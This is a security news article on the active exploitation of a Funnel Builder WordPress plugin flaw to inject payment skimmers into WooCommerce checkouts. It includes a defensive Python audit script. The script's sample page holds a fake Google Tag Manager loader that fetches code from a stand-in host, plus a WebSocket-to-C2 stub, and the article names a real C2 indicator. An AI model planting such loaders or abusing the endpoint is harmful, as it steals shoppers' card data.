A serious security vulnerability affecting the Funnel Builder plugin for WordPress has come under active exploitation to inject malicious JavaScript code into WooCommerce checkout pages with the goal of stealing payment data.
Details of the activity were published by Sansec this week. The vulnerability has no CVE identifier at the time of writing. It affects all versions of the plugin before 3.15.0.3; the plugin is used on more than 40,000 WooCommerce stores.
The Dutch e-commerce security company said the flaw allows unauthenticated attackers to inject arbitrary JavaScript into each of the store’s checkout pages. FunnelKit, which maintains Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
“Attackers are embedding fake Google Tag Manager scripts in the plugin’s ‘External Scripts’ setting,” it says. “The injected code looks like normal analytics next to the store’s actual tag, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout.”
According to Sansec, Funnel Builder exposes a public checkout endpoint that lets the incoming request select which internal method handles it. Older versions never checked the caller's permissions or restricted which methods could be invoked through that endpoint.
A bad actor could exploit this flaw with an unauthenticated request that invokes an internal method (Sansec did not name it) which writes attacker-controlled data directly to the plugin's global settings. The stored snippet is then emitted on every Funnel Builder checkout page.
As a result, an attacker can plant a <script> tag that fires on every checkout transaction on a vulnerable WordPress site.
In at least one case, Sansec said it observed a payload posing as the Google Tag Manager (GTM) loader that fetched JavaScript from a remote domain. That script in turn opens a WebSocket connection to the attacker's command-and-control (C2) server ("wss://protect-wss[.]com/ws") to retrieve a skimmer tailored to the victim's storefront.
The ultimate goal of the attack is to steal credit card numbers, CVVs, billing addresses and other personal information that may be entered by site visitors at the time of checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review Settings > Checkout > External Scripts for anything unfamiliar and remove it.
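The review step above can be scripted. The following is an added example, not Sansec's or FunnelKit's code: it parses the HTML of a saved checkout page, flags inline scripts that are shaped like the GTM bootstrap but fetch from a host other than Google's, flags third-party script sources, and extracts any ws:// or wss:// endpoint from a script body so that a downloaded remote loader can be checked for the WebSocket-to-C2 pattern described above. The checkout HTML and the remote loader text are constructed for the example and use reserved .example hostnames, not the indicators from the article; the store hostname is likewise assumed.

```python
"""Audit a WooCommerce checkout page for Google Tag Manager look-alike loaders.

Added example (not the plugin's or Sansec's code). All sample input is
constructed; hostnames are reserved .example names, not real indicators.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts from which a genuine Google Tag Manager / Analytics loader fetches.
GOOGLE_TAG_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

# An inline script that is dressed up as the GTM bootstrap snippet.
GTM_SIGNATURE = re.compile(r"gtm\.js|googletagmanager|dataLayer", re.I)
# Host of every absolute or protocol-relative URL referenced in script text.
URL_HOST = re.compile(r"(?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
# WebSocket endpoints (ws:// or wss://) referenced in script text.
WSS_HOST = re.compile(r"wss?://([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page as (src attribute, inline text)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:  # inside a <script> element
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def audit(html, store_host, allowed_hosts=GOOGLE_TAG_HOSTS):
    """Return (reason, host) findings for script tags that deserve a look."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.scripts:
        if src:
            host = urlparse(src).hostname  # None for relative, first-party paths
            if host and host != store_host and host not in allowed_hosts:
                findings.append(("external script src", host))
            continue
        if GTM_SIGNATURE.search(body):
            # A real GTM snippet only ever loads from Google's tag hosts.
            for host in URL_HOST.findall(body):
                if host.lower() not in allowed_hosts:
                    findings.append(("GTM-style loader fetching from non-Google host", host.lower()))
    return findings


def find_websocket_hosts(js_text):
    """Hosts a script (inline or fetched) opens ws:// or wss:// connections to."""
    return sorted({h.lower() for h in WSS_HOST.findall(js_text)})


# Constructed checkout page: the store's real GTM tag, an injected look-alike
# that loads from a foreign host, and an unrelated third-party pixel.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-0000000');</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://tag-loader.example/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-0000000');</script>
<script src="https://cdn.stats.example/pixel.js"></script>
</head><body>checkout form here</body></html>"""

# Constructed stand-in for the JavaScript a look-alike loader would fetch.
SAMPLE_REMOTE_LOADER_JS = (
    "var s=new WebSocket('wss://checkout-guard.example/ws');"
    "s.onmessage=function(e){/* payload handling omitted */};"
)

if __name__ == "__main__":
    for reason, host in audit(SAMPLE_CHECKOUT_HTML, "shop.example"):
        print(f"{reason}: {host}")
    print("websocket hosts:", find_websocket_hosts(SAMPLE_REMOTE_LOADER_JS))
```

The two GTM snippets differ only in the host inside `j.src`, which is exactly what a reviewer skimming for a familiar tag tends to miss; the audit compares that host against the allowlist rather than trusting the snippet's shape. Script sources that are first-party or on the allowlist produce no finding, so the output is short enough to act on.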
“Disguising skimmers as Google Analytics or Tag Manager code is a recurring Magecart pattern, as reviewers tend to give a cursory glance at anything that looks like a familiar tracking tag,” Sansec said.
The disclosure comes just weeks after Sucuri detailed a campaign in which Joomla websites were being backdoored with heavily obfuscated PHP code to contact attacker-controlled C2 servers, receive and process instructions sent by operators, and serve spammy content to visitors and search engines without the site owner’s knowledge. The ultimate objective is to take advantage of the sites’ reputation to insert spam.
“The script acts as a remote loader,” said security researcher Pooja Srivastava. “It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve.”
“This approach allows attackers to change the behavior of the compromised website at any time without having to modify local files again. The attacker can inject spam product links, redirect visitors, or dynamically display malicious pages.”